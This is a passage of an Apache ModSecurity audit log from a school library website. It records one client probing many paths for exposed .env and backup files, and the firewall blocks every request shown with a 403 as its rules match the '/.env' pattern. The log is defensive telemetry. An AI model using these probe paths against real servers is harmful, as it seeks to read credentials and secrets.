Accept-Encoding: gzip X-Varnish: 173412772 --2631e443-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --2631e443-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749163796874647 715 (- - -) Stopwatch2: 1749163796874647 715; combined=288, p1=254, p2=0, p3=0, p4=0, p5=34, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2631e443-Z-- --aa038b31-A-- [06/Jun/2025:05:49:57 +0700] aEIfFWaFzeU7VUj_TDFzzwAAABQ 103.236.140.4 48130 103.236.140.4 8181 --aa038b31-B-- GET /cron/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Cookie: X-Forwarded-For: 185.177.72.107 Accept-Encoding: gzip X-Varnish: 173236160 --aa038b31-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --aa038b31-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749163797055512 686 (- - -) Stopwatch2: 1749163797055512 686; combined=257, p1=220, p2=0, p3=0, p4=0, p5=37, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --aa038b31-Z-- --bc7d3255-A-- [06/Jun/2025:05:49:57 +0700] aEIfFeJsrKcXA4Tjex0GigAAAEY 103.236.140.4 48134 103.236.140.4 8181 --bc7d3255-B-- GET /www/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Cookie: X-Forwarded-For: 185.177.72.107 Accept-Encoding: gzip X-Varnish: 173412775 --bc7d3255-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --bc7d3255-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749163797236221 743 (- - -) Stopwatch2: 1749163797236221 743; combined=306, p1=274, p2=0, p3=0, p4=0, p5=32, sr=107, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bc7d3255-Z-- --e61be171-A-- [06/Jun/2025:05:49:57 +0700] aEIfFfHwHPygw9BuFzQ1vAAAAIA 103.236.140.4 48138 103.236.140.4 8181 --e61be171-B-- GET /docker/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Cookie: X-Forwarded-For: 185.177.72.107 Accept-Encoding: gzip X-Varnish: 173236163 --e61be171-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --e61be171-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749163797417046 706 (- - -) Stopwatch2: 1749163797417046 706; combined=281, p1=246, p2=0, p3=0, p4=0, p5=35, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e61be171-Z-- --c7c1c66f-A-- [06/Jun/2025:05:49:57 +0700] aEIfFfHwHPygw9BuFzQ1vQAAAIM 103.236.140.4 48142 103.236.140.4 8181 --c7c1c66f-B-- GET /docker/app/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Cookie: X-Forwarded-For: 185.177.72.107 Accept-Encoding: gzip X-Varnish: 173412778 --c7c1c66f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --c7c1c66f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749163797597864 695 (- - -) Stopwatch2: 1749163797597864 695; combined=278, p1=218, p2=0, p3=0, p4=0, p5=60, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c7c1c66f-Z-- --7e1aee27-A-- [06/Jun/2025:05:49:57 +0700] aEIfFdKrQJH3faNNWWAW-wAAANI 103.236.140.4 48146 103.236.140.4 8181 --7e1aee27-B-- GET /env.backup HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Cookie: X-Forwarded-For: 185.177.72.107 Accept-Encoding: gzip X-Varnish: 173236166 --7e1aee27-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --7e1aee27-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".backup"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749163797778573 1955 (- - -) Stopwatch2: 1749163797778573 1955; combined=677, p1=315, p2=327, p3=0, p4=0, p5=35, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7e1aee27-Z-- --a6695d0e-A-- [06/Jun/2025:05:49:58 +0700] aEIfFtKrQJH3faNNWWAXAAAAANc 103.236.140.4 48146 103.236.140.4 8181 --a6695d0e-B-- GET /.vscode/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Cookie: X-Forwarded-For: 185.177.72.107 Accept-Encoding: gzip X-Varnish: 173412787 --a6695d0e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --a6695d0e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749163798693752 574 (- - -) Stopwatch2: 1749163798693752 574; combined=212, p1=189, p2=0, p3=0, p4=0, p5=23, sr=57, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a6695d0e-Z-- --2c591267-A-- [06/Jun/2025:05:49:58 +0700] aEIfFtKrQJH3faNNWWAXAQAAAMA 103.236.140.4 48160 103.236.140.4 8181 --2c591267-B-- GET /js/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Cookie: X-Forwarded-For: 185.177.72.107 Accept-Encoding: gzip X-Varnish: 173236175 --2c591267-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --2c591267-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749163798874660 856 (- - -) Stopwatch2: 1749163798874660 856; combined=294, p1=261, p2=0, p3=0, p4=0, p5=33, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2c591267-Z-- --a90ee13e-A-- [06/Jun/2025:05:49:59 +0700] aEIfF9KrQJH3faNNWWAXAgAAAMM 103.236.140.4 48164 103.236.140.4 8181 --a90ee13e-B-- GET /laravel/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Cookie: X-Forwarded-For: 185.177.72.107 Accept-Encoding: gzip X-Varnish: 173412790 --a90ee13e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --a90ee13e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749163799055527 643 (- - -) Stopwatch2: 1749163799055527 643; combined=247, p1=221, p2=0, p3=0, p4=0, p5=26, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a90ee13e-Z-- --11c83775-A-- [06/Jun/2025:05:49:59 +0700] aEIfF9KrQJH3faNNWWAXAwAAAMI 103.236.140.4 48168 103.236.140.4 8181 --11c83775-B-- GET /laravel/core/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Cookie: X-Forwarded-For: 185.177.72.107 Accept-Encoding: gzip X-Varnish: 173236178 --11c83775-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --11c83775-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749163799236195 657 (- - -) Stopwatch2: 1749163799236195 657; combined=262, p1=236, p2=0, p3=0, p4=0, p5=26, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --11c83775-Z-- --2bfd4233-A-- [06/Jun/2025:05:49:59 +0700] aEIfF9KrQJH3faNNWWAXBAAAAMY 103.236.140.4 48172 103.236.140.4 8181 --2bfd4233-B-- GET /mail/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Cookie: X-Forwarded-For: 185.177.72.107 Accept-Encoding: gzip X-Varnish: 173412793 --2bfd4233-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --2bfd4233-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749163799416818 654 (- - -) Stopwatch2: 1749163799416818 654; combined=244, p1=218, p2=0, p3=0, p4=0, p5=26, sr=63, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2bfd4233-Z-- --ee100a51-A-- [06/Jun/2025:05:49:59 +0700] aEIfF9KrQJH3faNNWWAXBQAAAMc 103.236.140.4 48176 103.236.140.4 8181 --ee100a51-B-- GET /mailer/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Cookie: X-Forwarded-For: 185.177.72.107 Accept-Encoding: gzip X-Varnish: 173236181 --ee100a51-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --ee100a51-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749163799597509 23356 (- - -) Stopwatch2: 1749163799597509 23356; combined=45666, p1=215, p2=0, p3=0, p4=0, p5=22738, sr=64, sw=0, l=0, gc=22713 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ee100a51-Z-- --0ee30271-A-- [06/Jun/2025:05:49:59 +0700] aEIfF_HwHPygw9BuFzQ1vgAAAIQ 103.236.140.4 48180 103.236.140.4 8181 --0ee30271-B-- GET /nginx/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Cookie: X-Forwarded-For: 185.177.72.107 Accept-Encoding: gzip X-Varnish: 173412796 --0ee30271-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --0ee30271-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749163799778243 792 (- - -) Stopwatch2: 1749163799778243 792; combined=296, p1=259, p2=0, p3=0, p4=0, p5=36, sr=72, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0ee30271-Z-- --6b5da708-A-- [06/Jun/2025:05:49:59 +0700] aEIfF-JsrKcXA4Tjex0GiwAAAEg 103.236.140.4 48184 103.236.140.4 8181 --6b5da708-B-- GET /public/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Cookie: X-Forwarded-For: 185.177.72.107 Accept-Encoding: gzip X-Varnish: 173236184 --6b5da708-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --6b5da708-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749163799959019 757 (- - -) Stopwatch2: 1749163799959019 757; combined=334, p1=300, p2=0, p3=0, p4=0, p5=34, sr=132, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6b5da708-Z-- --dda6ae77-A-- [06/Jun/2025:05:50:00 +0700] aEIfGOJsrKcXA4Tjex0GjAAAAEo 103.236.140.4 48188 103.236.140.4 8181 --dda6ae77-B-- GET /site/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Cookie: X-Forwarded-For: 185.177.72.107 Accept-Encoding: gzip X-Varnish: 173412799 --dda6ae77-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --dda6ae77-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749163800139797 702 (- - -) Stopwatch2: 1749163800139797 702; combined=268, p1=233, p2=0, p3=0, p4=0, p5=34, sr=68, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dda6ae77-Z-- --4f2c5f76-A-- [06/Jun/2025:05:50:00 +0700] aEIfGOJsrKcXA4Tjex0GjQAAAEk 103.236.140.4 48192 103.236.140.4 8181 --4f2c5f76-B-- GET /xampp/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Cookie: X-Forwarded-For: 185.177.72.107 Accept-Encoding: gzip X-Varnish: 173236187 --4f2c5f76-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --4f2c5f76-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749163800320632 720 (- - -) Stopwatch2: 1749163800320632 720; combined=313, p1=280, p2=0, p3=0, p4=0, p5=32, sr=118, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4f2c5f76-Z-- --f73d0f05-A-- [06/Jun/2025:05:50:00 +0700] aEIfGNKrQJH3faNNWWAXBgAAAMg 103.236.140.4 48196 103.236.140.4 8181 --f73d0f05-B-- GET /.docker/laravel/app/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Cookie: X-Forwarded-For: 185.177.72.107 Accept-Encoding: gzip X-Varnish: 173412802 --f73d0f05-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --f73d0f05-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749163800501403 699 (- - -) Stopwatch2: 1749163800501403 699; combined=282, p1=249, p2=0, p3=0, p4=0, p5=33, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f73d0f05-Z-- --0997e92f-A-- [06/Jun/2025:05:50:00 +0700] aEIfGNKrQJH3faNNWWAXBwAAAMw 103.236.140.4 48200 103.236.140.4 8181 --0997e92f-B-- GET /laravel/.env.local HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Cookie: X-Forwarded-For: 185.177.72.107 Accept-Encoding: gzip X-Varnish: 173236190 --0997e92f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --0997e92f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749163800682123 690 (- - -) Stopwatch2: 1749163800682123 690; combined=294, p1=262, p2=0, p3=0, p4=0, p5=32, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0997e92f-Z-- --65b2e310-A-- [06/Jun/2025:05:50:00 +0700] aEIfGNKrQJH3faNNWWAXCAAAAM0 103.236.140.4 48204 103.236.140.4 8181 --65b2e310-B-- GET /laravel/.env.production HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Cookie: X-Forwarded-For: 185.177.72.107 Accept-Encoding: gzip X-Varnish: 173412805 --65b2e310-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --65b2e310-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749163800862814 710 (- - -) Stopwatch2: 1749163800862814 710; 